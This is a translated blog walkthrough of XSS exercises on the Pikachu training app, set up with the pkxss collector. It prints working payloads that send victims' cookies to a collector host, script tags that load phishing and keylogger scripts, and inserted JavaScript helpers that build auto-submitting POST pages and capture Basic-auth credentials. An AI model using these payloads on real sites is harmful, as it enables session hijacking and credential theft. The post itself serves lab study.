Pikachu: three kinds of XSS cases

Digression:

  Before starting, allow me a short rant. If you are eager to begin the XSS journey, skip ahead.

  It is well known in the industry that most programmers take a lazy approach to life and work: rigorous enough, but not careful enough, and "good enough" is where the work stops. That is not really a fair yardstick for programmers, though. Compared horizontally, many programmers are not like that at all, and compared vertically, people with these habits are common in other fields too. A set of shared habits in a group of people probably has more to do with the style of the city and the society they live in.

  Writing a blog post is time-consuming. You have to think through every step and get every operation right, because the subject is exact, and anyone who knows the topic can tell at a glance how much of a post is padding (for a programmer, "padding" comes down to whether the author actually has the professional skills and whether the text is copied). On top of that, a blog post is not just a pile of screenshots; it needs words, and those words have to read fluently, so that one day, when some piece of knowledge has been forgotten, we can find our own answer in the post again.

  But does that actually work? When something is almost forgotten, can we really recover it from the post without relearning it? For most programmers I would not count on it. Under normal circumstances we forget things, and something half remembered comes back with a nudge. But think back: how many redox reactions do you still remember? Can you write the reaction for a given organic molecule? Electromagnetic relays, the Lorentz force, Lenz's law, the derivative of a logarithm or of an exponential, the sixty classical poems we had to memorise: we were all fluent in these once. Look at the rule and its short explanation now; can you still solve the problem?

  So, after all that preamble, what I want to say is this. Even if a post is written only for yourself, write it fluently, avoid typos, crop every picture properly and describe clearly what each picture shows. Do not assume that "people will work it out" or "others will surely understand"; we should not look at the world in isolation, because a lot of people will not understand. If you want to leave something out, you have the responsibility to mark the source of that knowledge so the reader can go on learning. If it really is only for yourself, a Word document would do. Since you use this platform and enjoy the convenience and rights it gives, you should also fulfil the corresponding obligation. This has nothing to do with coding ability or operational skill; it is just a sense of responsibility, and the accumulation and exchange of knowledge, and the development and inheritance of civilisation, cannot be separated from it.

  We may be highly skilled (I say "we" only for a sense of identity; my own level is not high), but a post whose details are unclear and whose sentences are uncertain just wastes a learner's valuable time: they stare at a screenshot of a successful run and can do nothing with it. Imagine that twenty years from now we need to rebuild an environment, our head is empty, we open the post and stare helplessly at that same screenshot; being upset then will not help. Put yourself in their place: when we read other people's posts we inevitably want the same things, so why not do for our own readers what we would ask of others?

  All in all, please take every blog post seriously, get the details right, and write every word with a sense of responsibility.

Building the XSS backend:

  For the cookie experiments that follow we need the pkxss backend, which receives the stolen cookie values. There are two ways to set this up: use two hosts with different IPs, or test everything on the single Pikachu machine. I use the latter here; in practice it only means changing one IP. Installing the pkxss backend was already covered in my earlier post, Pikachu: environment installation and brute force.

  First, move the pkxss folder out of Pikachu-master (the folder name may differ from person to person; note yours, it matters later) and put it in the same directory as Pikachu, that is, under the WWW directory:

  In fact, if you now follow the normal steps and open pkxss in Firefox, you will find it goes straight to the backend, because it was installed once already. Now open the folder and look at the configuration file. I did not actually change anything here: the question is only whether localhost needs to be modified, and it does not; and since I had not changed the MySQL configuration, the database name and password did not need changing either:

   Now open the pkxss page; a red link asks you to perform the initial installation:

  Click it and we hit a problem: the initialization fails.

  The problem actually lies in the IP. Many blogs simply tell you to change one of the addresses in the config.inc.php file shown above from the original 192.168.1.1 (or localhost) to something like 192.168.10.100. If that is not your host's IP, and not localhost either, how could it possibly succeed?

  This time we change the host IP instead. Click phpStudy, open the "Other options menu" and click "Open hosts":

   Select the place where you want to set the IP; mine is 192.168.1.111. Then save:

   To change the host IP, right-click the small computer icon in the bottom right corner, click "Open Network Connections", right-click the local connection and click Properties, and double-click the entry shown in the picture; if there are two, open the IPv4 one:

   Fill in the IP address, subnet mask and gateway as shown below; the IP address and the gateway must be in the same network segment:

   After saving, click the red initial-installation link on the page again, and "Success" appears:

   Then "click here" to enter the home page and log in with admin / 123456:

   Next, the redirect setting. The IP used here is the one we just configured; it determines the page the victim is bounced to after the cookie has been captured:

  If you set it carelessly, for example to 192.168.1.110 as I did here, the redirect fails; how the redirect works is explained further below:

   So set this to 192.168.1.111 as well, and pay attention to this URL! Looking at it carefully, it is the Pikachu home page that the victim is redirected to. If the Pikachu folder name in it is wrong the redirect fails, because that folder cannot be found; this is why I noted the folder name in brackets above. For example, my folder is named pikachu-master, so a URL of http://192.168.1.111/pikachu/index.php fails because no such folder exists. The correct URL is:

  http://192.168.1.111/pikachu-master/index.php

   Modify it according to your own situation.

One, Cookie theft with GET-type XSS

  Open "Reflective XSS (get)" and type something in the text box. From the earlier exercises we already know the input is limited to 20 characters (a maxlength attribute on the input), so press F12 to open the developer tools and raise the limit:

   Select the input element with the element picker; I have already changed the length here. Next open the pkxss backend and click "Cookie collection"; this page appears:

   Type the following JavaScript into the text box. When the page reflects it, the browser navigates to the collector with document.cookie appended to the query string:

  <script>document.location='http://192.168.1.111/pkxss/xcookie/cookie.php?cookie=' +document.cookie;</script>

   Look at the pkxss backend: a record has appeared. Because I had already logged in several times before, and every return to the page or redirect runs the XSS again and captures a cookie, the id is 4; that can be ignored, and I only show this one record. We have obtained the cookie:

  PHPSESSID = 31dea1b72e9ea745f126a5267b86da34

  The referer column shows the page the cookie came from. The link below is what would be sent to a victim: once the victim opens it, they are redirected to the home page, but along the way we have obtained their cookie value:

  http://192.168.1.111/pikachu-master/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.1.111%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2Bdocument.cookie%3B%3C%2Fscript%3E&submit=submit


POST-type XSS: obtaining the cookie value

   Log in:

  Enter <script>alert('xss')</script>; the vulnerability fires, but the address bar does not change, because POST parameters are not carried in the URL:

  Look at the file pkxss/xcookie/post.html:

  We need to host a malicious site of our own that contains a POST form, and send the link to this site to the victim. When the victim is induced to click it, the form automatically submits a POST request to the vulnerable server, so the victim makes the POST request for us.

  First, modify the two server addresses in the malicious page: the upper one is the address of the page with the XSS vulnerability, the lower one is the address of the backend that receives the cookie.

  The role of the malicious page is this: when a user visits it, it automatically sends the POST request to the vulnerable server, and the user is then redirected to the vulnerable server's index page.

  If a user is tricked into visiting the page, the cookie value appears in pkxss.
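The two exchanges described in this POST-type section and in the GET-type section above, written out as an added example; this is not code from the original post or from pkxss. The IP, paths and payload are the ones used in this post; the `message`/`submit` field names for the POST page and the way the collector reads its request are assumptions, labelled in the comments.

```javascript
// Added example (not pkxss code): the reflected-XSS cookie-theft exchange,
// GET and POST variants, plus what the collector sees when the victim arrives.
// URL and URLSearchParams are globals in Node and in browsers.

const PKXSS_COOKIE_SINK = 'http://192.168.1.111/pkxss/xcookie/cookie.php?cookie=';

// The payload from the GET section: navigate the victim's browser to the
// collector with document.cookie appended. Cookies flagged HttpOnly are not
// readable through document.cookie, so they would never show up here.
function cookieStealerPayload(sink = PKXSS_COOKIE_SINK) {
  return `<script>document.location='${sink}' +document.cookie;</script>`;
}

// GET-type: the payload travels in the query string, so the link is the attack.
// URLSearchParams applies form encoding, the same thing the browser does when
// the lab's form is submitted; that is why spaces become '+' and not '%20'.
function reflectedGetLink(vulnPage, payload) {
  const params = new URLSearchParams({ message: payload, submit: 'submit' });
  return `${vulnPage}?${params.toString()}`;
}

// POST-type: the payload cannot ride in a link, so the attacker hosts a page
// (post.html in pkxss) whose hidden form auto-submits to the vulnerable
// endpoint. Attribute values are HTML-escaped so the <script> in the payload
// is stored inertly in the attacker's page and decoded again on submit.
function escapeHtmlAttr(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function autoSubmitPostPage(vulnPage, fields) { // field names are an assumption
  const inputs = Object.entries(fields)
    .map(([k, v]) => `<input type="hidden" name="${escapeHtmlAttr(k)}" value="${escapeHtmlAttr(v)}">`)
    .join('\n    ');
  return `<html><body>
  <form id="f" method="POST" action="${escapeHtmlAttr(vulnPage)}">
    ${inputs}
  </form>
  <script>document.getElementById('f').submit();</script>
</body></html>`;
}

// Collector side (assumed behaviour of cookie.php): read the `cookie` query
// parameter and the Referer header. The Referer is the vulnerable page the
// victim was redirected from, which is why the backend's referer column
// points back at the Pikachu URL.
function parseCookieHit(requestUrl, headers) {
  const u = new URL(requestUrl);
  const cookie = u.searchParams.get('cookie') || '';
  const phpsessid = (cookie.match(/PHPSESSID=([^;]+)/) || [])[1] || null;
  return { cookie, phpsessid, referer: headers.referer || null };
}

module.exports = { cookieStealerPayload, reflectedGetLink, autoSubmitPostPage, parseCookieHit };
```

`reflectedGetLink` with the post's vulnerable page and payload reproduces the long link shown above character for character, which is a quick way to confirm how the browser encoded the form when the post's screenshot was taken.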


Two, XSS phishing demo

  Modify the IP in the folder (the exact path is shown below):

   There are xfish.php and fish.php in the folder. Open fish.php as shown in the figure and change the IP:

   Next look at the content of xfish.php and analyse the code: it pops up an authentication box, takes the entered username and password, and redirects to the backend, which stores the captured username and password behind the same kind of interface as before.

  The attacker presents a page that looks normal, which the user cannot distinguish from a trusted page, but embedded in it is the attacker's malicious code, which steals some of the user's information. When the user opens the page it looks normal; in fact the login information is captured in the attacker's backend.

  Either of the following two payloads, inserted into a page with an XSS vulnerability, triggers the phishing box:

  <img src="http://192.168.1.111/pkxss/xfish/fish.php"/>

  <script src="http://192.168.1.111/pkxss/xfish/fish.php"></script>

   Enter admin / 123456 in the box; the pkxss backend shows the record. Refreshing adds a new record, because the backend has already stored the information (I obtained the result and then refreshed twice):
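The login-box mechanism in this section, as an added example that is not the pkxss code: fish.php's own source is not reproduced here, so this models only the behaviour the post describes (a browser authentication dialog whose credentials end up recorded in the backend). The realm text and the `username`/`password` query-parameter names on xfish.php are assumptions.

```javascript
// Added example (not pkxss code): a model of the HTTP Basic-auth phishing
// flow. A resource loaded by <img src> or <script src> that answers 401 with
// WWW-Authenticate makes the browser show a credentials dialog on top of the
// page that embedded it; the page itself still looks normal to the user.

const XFISH_RECORDER = 'http://192.168.1.111/pkxss/xfish/xfish.php'; // assumed recorder URL

// What the browser sends after the user types a username and password into
// the dialog: "Basic " + base64("user:pass"), i.e. the password in clear.
function basicAuthHeader(username, password) {
  return 'Basic ' + Buffer.from(`${username}:${password}`, 'utf8').toString('base64');
}

// Server side: recover the credentials from the Authorization header.
// Only the first ':' separates user from password, so passwords may contain ':'.
function decodeBasicAuth(authorizationHeader) {
  if (!authorizationHeader) return null;
  const m = /^Basic\s+([A-Za-z0-9+\/=]+)$/.exec(authorizationHeader.trim());
  if (!m) return null;
  const decoded = Buffer.from(m[1], 'base64').toString('utf8');
  const idx = decoded.indexOf(':');
  if (idx < 0) return null;
  return { username: decoded.slice(0, idx), password: decoded.slice(idx + 1) };
}

// The phishing endpoint's behaviour as a function of the request headers:
// no credentials -> 401 challenge (dialog appears); credentials present ->
// redirect to the recorder with them in the query string (assumed parameter
// names), where the backend stores them.
function fishResponse(headers) {
  const creds = decodeBasicAuth(headers.authorization);
  if (!creds) {
    return { status: 401, headers: { 'WWW-Authenticate': 'Basic realm="Pikachu"' } }; // realm is an assumption
  }
  const q = new URLSearchParams({ username: creds.username, password: creds.password });
  return { status: 302, headers: { Location: `${XFISH_RECORDER}?${q}` } };
}

module.exports = { basicAuthHeader, decodeBasicAuth, fishResponse };
```

The browser attaches the Authorization header to every retry of the same resource after the dialog, which is why refreshing the page adds another record: the backend receives the credentials again each time.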


Three, XSS keylogger

Cross-origin:

  Before starting we need to understand cross-origin access. Literally it means crossing from one domain into another, and of course that is not allowed by default. If a website were a home and each page a room, each room can only be opened with its own key; the key to someone else's home cannot open the door of yours, after all nobody lets a stranger sleep on their couch. By the same principle, a page from 360 cannot run a script on a page from Baidu; of course that cannot be allowed.

  Put more academically, pages must be of the same origin (not one of us, not in our house), meaning the browser will not let a script from one site act on another site. This is a security restriction imposed by the browser's same-origin policy.

  "Same origin" means the domain, the protocol and the port are all the same.

  If that is unclear, here are some examples:

  http://www.123.com/index.html calls http://www.123.com/server.php (same origin, not cross-origin)

  http://www.123.com/index.html calls http://www.456.com/server.php (different main domain: 123 / 456, cross-origin)

  http://abc.123.com/index.html calls http://def.123.com/server.php (different subdomain: abc / def, cross-origin)

  http://www.123.com:8080/index.html calls http://www.123.com:8081/server.php (different port: 8080 / 8081, cross-origin)

  http://www.123.com/index.html calls https://www.123.com/server.php (different protocol: http / https, cross-origin)

  Please note: although localhost and 127.0.0.1 both point to the local machine, they are also cross-origin with respect to each other.

(For an explanation of same origin and some methods that allow cross-origin access, see the original article at this link:

  https://blog.csdn.net/lambert310/article/details/51683775)

  So let us check whether the cross-origin restriction applies here. Open rkserver.php (path as shown below):

   In the highlighted part, the author has already allowed cross-origin access by sending the CORS response headers:
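The same-origin comparison walked through above, and the cross-origin read check that rkserver.php's CORS header exists to satisfy, as an added example; this is not code from the post or from pkxss. The hostnames and ports are the post's own examples; the CORS logic is the standard browser rule reduced to the one response header pkxss relies on.

```javascript
// Added example (not pkxss code): same-origin comparison and the CORS
// decision a browser makes before letting a script read a cross-origin
// response. URL is a global in Node and in browsers.

function originOf(urlString) {
  const u = new URL(urlString);
  // u.port is '' for the scheme's default port; fill it in so that
  // "http://a/" and "http://a:80/" compare as the same origin.
  const port = u.port || (u.protocol === 'https:' ? '443' : u.protocol === 'http:' ? '80' : '');
  return { protocol: u.protocol, host: u.hostname, port };
}

// The rule from the text: protocol, host and port must all be equal.
function isSameOrigin(pageUrl, resourceUrl) {
  const a = originOf(pageUrl), b = originOf(resourceUrl);
  return a.protocol === b.protocol && a.host === b.host && a.port === b.port;
}

// Explain which component differs. Hosts are compared as strings, which is
// why "localhost" and "127.0.0.1" are different origins even though they
// resolve to the same machine.
function whyCrossOrigin(pageUrl, resourceUrl) {
  const a = originOf(pageUrl), b = originOf(resourceUrl);
  const reasons = [];
  if (a.protocol !== b.protocol) reasons.push(`protocol ${a.protocol} vs ${b.protocol}`);
  if (a.host !== b.host) reasons.push(`host ${a.host} vs ${b.host}`);
  if (a.port !== b.port) reasons.push(`port ${a.port} vs ${b.port}`);
  return reasons;
}

// Whether a script running at pageOrigin may read the response to an XHR/fetch
// it sent to another origin. The browser looks at Access-Control-Allow-Origin
// on the response: '*' opens it to every origin (what the keylogger server
// relies on), a literal origin must match exactly, anything else blocks the
// read. Note the request was still sent and processed by the server; CORS only
// governs whether the page gets to see the answer.
function corsAllowsRead(pageOrigin, responseHeaders, withCredentials = false) {
  const acao = responseHeaders['access-control-allow-origin'];
  if (!acao) return false;
  if (acao === '*') return !withCredentials; // '*' is refused for credentialed requests
  return acao === pageOrigin;
}

module.exports = { originOf, isSameOrigin, whyCrossOrigin, corsAllowsRead };
```

`corsAllowsRead` is the reason rkserver.php has to set the header: rk.js runs inside the victim site's origin, and without `Access-Control-Allow-Origin` the browser would refuse the keylogger's POST response, which is also what the "page request failed" message at the end of this post looks like from the victim's side.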


   Then we can use tags to carry out the keystroke capture. The following tags are allowed to load cross-origin resources; we already met them in Pikachu: brute force:

  <script src="..."> // JavaScript, loaded and executed locally

  <img src="..."> // images

  <link href="..."> // CSS

  <iframe src="..."> // any resource

  Let us analyse the code of the other files in this folder. Only the js file needs a look: it is injected into the page the victim is browsing, captures the keystroke values, and POSTs them to the backend at the attacker's IP:

   The last folder just records the keystroke results; nothing special:

  Then insert the code into a site with stored XSS. A script tag is used here; other tags work too of course, this is only an example:

   <script src="http://192.168.1.111/pkxss/rkeypress/rk.js"></script>

  Type anything on the keyboard and a "page request failed" message pops up; in the pkxss backend we can then see the captured information.


Origin www.cnblogs.com/FHBBS/p/12539822.html